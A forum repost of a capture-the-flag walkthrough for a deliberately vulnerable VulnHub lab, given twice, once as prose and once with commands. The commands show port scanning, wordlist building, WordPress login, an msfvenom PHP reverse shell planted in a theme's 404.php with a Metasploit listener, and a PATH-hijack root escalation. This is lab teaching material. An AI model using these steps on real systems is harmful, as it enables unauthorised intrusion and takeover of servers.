Arsione2121
Code Minifier
Divine
2
MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1
300 XP
A new challenge for all of you guys!
This CTF is all about conquering flags coming across our way as we go further in our penetration testing of this lab. All the flags should be discovered in form of: Country name Flag:[md5 hash]. The network interface of this virtual machine will take itâs IP settings from DHCP.
Download lab from here: https://www.vulnhub.com/entry/usv-2016-v101,175/
Letâs get started with our first step.
From this, we get our target IP.
Target IP: 192.168.0.103
Now we will scan it with nmap which will give us all the open ports in a particular lab for further penetration testing.
This result shows that the following ports are open 22, 80, 3129, 3306, 21211 and http proxy is used on port 3129.
So now letâs proceed with further penetration testing. Firstly weâll go with ssh on port 22.
Ssh revealed a ascii Dragon with some strings and a base64 code written at the bottom. Looking closer youâll see something written on top AES-ECB.
By Google search, we found out that there is a website called aesencryption.net where we can decrypt the base64 code we got in our last result. So we will decrypt that code with the given key in the image by all this process we arrived at our 1st flag i.e ITALY FLAG
Ok so now letâs head towards the second flag and for that, we are going to open target IP in the browser as port 80 is also open. Look at that. We got access forbidden. No result.
As we opened target IP in browser simultaneously we have captured the cookies through burp suite after setting the manual proxy in the browser. When all this is done, right click on its window where intercepted data is fetched and a kind of action list will put on view further click to send to the repeater.
Look over screenshot below you will find two panels left and right for request and response respectively. In the response window, the highlighted text is our flag.
As this code is in base64 so we are going to use HackBar plugin in Mozilla Firefox which is preinstalled or can be easily installed. Whoa decoding the code in it we got another flag which is our second flag i.e. CROATIA FLAG
Moving ahead, from our nmap result we got that http-proxy is set on port 3129 so we will set the proxy setting for our target IP with port number 3129 as shown below.
Now try opening target IP in a browser and wait for a few seconds like 10 sec. The proxy setting did the trick and website reveals a single page with a changing banner of âWINTER IS COMINGâ and âALL MEN MUST DIEâ. Some of you may be aware of this but for those who do not know about this. It is Games of Thrones.
The site didnât show much so I used Nikto scanner with a proxy to get some information about it which will be helpful in further testing.
It reveals a WordPress login at /blog.
Ok! Now open it in the browser. Great, Games of Thrones notion is confirmed as Seven Kingdoms blog is shown.
Scrolling down in this site you can see that there is an interesting second post which shows âI have a message for youâ. There is a highlighted option so just try to open it in the browser.
Awesome!!!! This reveals a message and a download link for a zip file. Interesting, so go ahead and download it.
Unzipping the file shows an image of a man with a bottle of perfume and a base64 encoded string at the bottom.
Here we decrypt the code in the hackbar plugin which results in another flag. From this step, we got our third flag i.e. PORTUGAL FLAG
Now, returning to the previous site there are several posts which are all useless so just scroll down to see if there is something useful or not and then comes the last post which is of our interest.
âProtected: the secret chapter â
Oh! We have to provide a password to get through it. This one took some time and to spare your time I wonât go through my failures,
I have created a dictionary of possible passwords which are nothing but some of the words in this whole page with the help of the following command.
From the list we get that password is âwesterosiâ
Using this password we came to another page which revealed another flag in base64 encoded string and below it some kind of images of an actress.
Now again decrypt it in and as a result, we have our fourth flag i.e. PARAGUAY FLAG
Moving to one level up, from the site we got another message that âthe mother_of_dragons has a password which is in right front of your eyesâ.
Knowing nothing about the eyes of actress I restored to google to see if I get any clue from there but no such luck.
I looked at the message again and it states âpassword which is in front of your eyesâ
Thatâs the password of mother_of_dragons is âin front of your eyesâ. But wait a minute where is this password is used.
We have an FTP service running. So letâs try and get through it
bingo! Here that password is used. At the bottom result shows that childrenâs name is used for the password. Again a password but this time it is used for WordPress login which we are going to use in coming steps.
Again I googled and found out she doesnât have any children rather had 3 dragons named Drogon, Rhaegal, and Viserion. So I put all these names into a file along with all possible combinations.
The list is small so by entering each one the desired password could find out.
Password is RhaegalDrogonViserion
Apply the credentials for WordPress and we are in!
Looking around the site I found the profile section which reveals the base64 encoded string for mother_of_dragons.
Like always decode the base64 code in HackBar and here we have another flag.
This is our fifth flag i.e. THAILAND FLAG
Now with only 2 flags left its time for shell access as we have WordPress.
Moving further, firstly make a php code through msfvenom which can be used to get the meterpreter session.
Being admin of the site I am able to edit the theme. So I replaced the 404.php code of template in Viking theme with the above-highlighted php code.
On the other side to get the meterpreter session open kali terminal and run multi handler. And for that type the following commands.
as we have a meterpreter session, now go to shell and type following commands
it shows a reward_flag.txt file so call it with the cat command
cat reward_flag.txt
As a result, we get a base64 encoded string.
Do not worry soon this decoding thing is going to over as we have the sixth flag with this decoding. So, as a result, our sixth flag is MONGOLIA FLAG
Back to another file in the above list of files i.e. winterfell_messenger . We see its executable and owner is root. So run it with the following command
It shows that itâs using the cat command to read a file in the /root directory.
Using strings shows that cat command is being used; however, itâs not using the full path to the program. From this, we come to know that it will search for set PATH to run.
Now, we are able to update PATH by using export but first, we need to find out the writable directory and for that, we have used /tmp. In /tmp, we will create an executable file named cat so it can be called by the winterfell_messenger program. This file will be running as root so we will use /bin/bash to call shell and to change the mode. Run the following commands.
After this step, we are going to update the PATH to remove the /tmp directory we added. For this type the following commands.
Now, we will go to the home directory of http to get the desired file. For that type
now call the winterfell_messenger file by using given command.
Now go to root and there we have .flag.txt file.
Now running cat against .flag.txt we get congratulations, a wolf made up of ascii characters and a base64 encoded string at the bottom. Commands are given below.
Finally decoding in hackbar reveals the seventh and last flag which is nothing but the SOMALIA FLAG
Whoola. We reached at the end and with this job is done. Hope you enjoyed it and obviously, penetration skills are refreshed.
Author: Vishva Vaghela is a Digital Forensics enthusiast and enjoys technical content writing. You can reach her on Here
This CTF is all about conquering flags coming across our way as we go further in our penetration testing of this lab. All the flags should be discovered in form of: Country name Flag:[md5 hash]. The network interface of this virtual machine will take itâs IP settings from DHCP.
Download lab from here: https://www.vulnhub.com/entry/usv-2016-v101,175/
Letâs get started with our first step.
Code:
netdiscover
From this, we get our target IP.
Target IP: 192.168.0.103

Now we will scan it with nmap which will give us all the open ports in a particular lab for further penetration testing.
Code:
nmap -p- -A 192.168.0.103
This result shows that the following ports are open 22, 80, 3129, 3306, 21211 and http proxy is used on port 3129.

So now letâs proceed with further penetration testing. Firstly weâll go with ssh on port 22.
Code:
ssh 192.168.0.103
Ssh revealed a ascii Dragon with some strings and a base64 code written at the bottom. Looking closer youâll see something written on top AES-ECB.

By Google search, we found out that there is a website called aesencryption.net where we can decrypt the base64 code we got in our last result. So we will decrypt that code with the given key in the image by all this process we arrived at our 1st flag i.e ITALY FLAG

Ok so now letâs head towards the second flag and for that, we are going to open target IP in the browser as port 80 is also open. Look at that. We got access forbidden. No result.

As we opened target IP in browser simultaneously we have captured the cookies through burp suite after setting the manual proxy in the browser. When all this is done, right click on its window where intercepted data is fetched and a kind of action list will put on view further click to send to the repeater.
Look over screenshot below you will find two panels left and right for request and response respectively. In the response window, the highlighted text is our flag.

As this code is in base64 so we are going to use HackBar plugin in Mozilla Firefox which is preinstalled or can be easily installed. Whoa decoding the code in it we got another flag which is our second flag i.e. CROATIA FLAG

Moving ahead, from our nmap result we got that http-proxy is set on port 3129 so we will set the proxy setting for our target IP with port number 3129 as shown below.

Now try opening target IP in a browser and wait for a few seconds like 10 sec. The proxy setting did the trick and website reveals a single page with a changing banner of âWINTER IS COMINGâ and âALL MEN MUST DIEâ. Some of you may be aware of this but for those who do not know about this. It is Games of Thrones.

The site didnât show much so I used Nikto scanner with a proxy to get some information about it which will be helpful in further testing.
Code:
nikto -h 192.168.0.103 âuseproxy http://192.168.0.103:3129
It reveals a WordPress login at /blog.

Ok! Now open it in the browser. Great, Games of Thrones notion is confirmed as Seven Kingdoms blog is shown.
Scrolling down in this site you can see that there is an interesting second post which shows âI have a message for youâ. There is a highlighted option so just try to open it in the browser.

Awesome!!!! This reveals a message and a download link for a zip file. Interesting, so go ahead and download it.


Unzipping the file shows an image of a man with a bottle of perfume and a base64 encoded string at the bottom.

Here we decrypt the code in the hackbar plugin which results in another flag. From this step, we got our third flag i.e. PORTUGAL FLAG

Now, returning to the previous site there are several posts which are all useless so just scroll down to see if there is something useful or not and then comes the last post which is of our interest.
âProtected: the secret chapter â

Oh! We have to provide a password to get through it. This one took some time and to spare your time I wonât go through my failures,
I have created a dictionary of possible passwords which are nothing but some of the words in this whole page with the help of the following command.
Code:
cewl -d 2 -m 5 --proxy_host 192.168.0.103 --proxy_port 3129 -w /root/Desktop/dict.txt http://192.168.0.103/blog/

From the list we get that password is âwesterosiâ
Using this password we came to another page which revealed another flag in base64 encoded string and below it some kind of images of an actress.

Now again decrypt it in and as a result, we have our fourth flag i.e. PARAGUAY FLAG

Moving to one level up, from the site we got another message that âthe mother_of_dragons has a password which is in right front of your eyesâ.
Knowing nothing about the eyes of actress I restored to google to see if I get any clue from there but no such luck.
I looked at the message again and it states âpassword which is in front of your eyesâ
Thatâs the password of mother_of_dragons is âin front of your eyesâ. But wait a minute where is this password is used.
We have an FTP service running. So letâs try and get through it
Code:
ftp 192.168.0.103 21211
ls âal
get .note.txt
exit
cat .note.txt
bingo! Here that password is used. At the bottom result shows that childrenâs name is used for the password. Again a password but this time it is used for WordPress login which we are going to use in coming steps.

Again I googled and found out she doesnât have any children rather had 3 dragons named Drogon, Rhaegal, and Viserion. So I put all these names into a file along with all possible combinations.
The list is small so by entering each one the desired password could find out.
Password is RhaegalDrogonViserion

Apply the credentials for WordPress and we are in!
Looking around the site I found the profile section which reveals the base64 encoded string for mother_of_dragons.

Like always decode the base64 code in HackBar and here we have another flag.
This is our fifth flag i.e. THAILAND FLAG

Now with only 2 flags left its time for shell access as we have WordPress.
Moving further, firstly make a php code through msfvenom which can be used to get the meterpreter session.
Code:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.104 lport=4444 -f raw

Being admin of the site I am able to edit the theme. So I replaced the 404.php code of template in Viking theme with the above-highlighted php code.

On the other side to get the meterpreter session open kali terminal and run multi handler. And for that type the following commands.
Code:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.104
set lport 4444
exploit
as we have a meterpreter session, now go to shell and type following commands
Code:
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py
Code:
cd /srv/http
ls
it shows a reward_flag.txt file so call it with the cat command
cat reward_flag.txt
As a result, we get a base64 encoded string.

Do not worry soon this decoding thing is going to over as we have the sixth flag with this decoding. So, as a result, our sixth flag is MONGOLIA FLAG

Back to another file in the above list of files i.e. winterfell_messenger . We see its executable and owner is root. So run it with the following command
Code:
./winterfell_messenger
cat /root/message.txt
It shows that itâs using the cat command to read a file in the /root directory.
Using strings shows that cat command is being used; however, itâs not using the full path to the program. From this, we come to know that it will search for set PATH to run.

Now, we are able to update PATH by using export but first, we need to find out the writable directory and for that, we have used /tmp. In /tmp, we will create an executable file named cat so it can be called by the winterfell_messenger program. This file will be running as root so we will use /bin/bash to call shell and to change the mode. Run the following commands.
Code:
echo "/bin/bash" > /tmp/cat
chmod 777 /tmp/cat
echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin
After this step, we are going to update the PATH to remove the /tmp directory we added. For this type the following commands.
Code:
export PATH=/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin
Now, we will go to the home directory of http to get the desired file. For that type
Code:
cd /srv/http
ls
now call the winterfell_messenger file by using given command.
Code:
./winterfell_messenger
id

Now go to root and there we have .flag.txt file.
Now running cat against .flag.txt we get congratulations, a wolf made up of ascii characters and a base64 encoded string at the bottom. Commands are given below.
Code:
cd /root
/usr/sbin/cat .flag.txt

Finally decoding in hackbar reveals the seventh and last flag which is nothing but the SOMALIA FLAG

Whoola. We reached at the end and with this job is done. Hope you enjoyed it and obviously, penetration skills are refreshed.
Author: Vishva Vaghela is a Digital Forensics enthusiast and enjoys technical content writing. You can reach her on Here